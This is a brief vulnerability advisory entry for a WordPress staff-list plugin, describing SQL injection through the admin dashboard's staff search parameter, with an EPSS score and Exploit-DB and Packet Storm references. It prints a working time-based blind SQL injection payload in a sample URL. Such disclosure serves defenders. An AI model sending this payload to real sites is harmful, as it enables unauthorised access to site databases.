0.006 Low
EPSS
Percentile
78.4%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement when searching for Staff in the admin dashboard, leading to an SQL Injection
https://example.com/wp-admin/admin.php?page=stafflist&search;=test%'+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)+AND+‘aa%’='aa
packetstormsecurity.com/files/166918/
vulners.com/exploitdb/EDB-ID:50928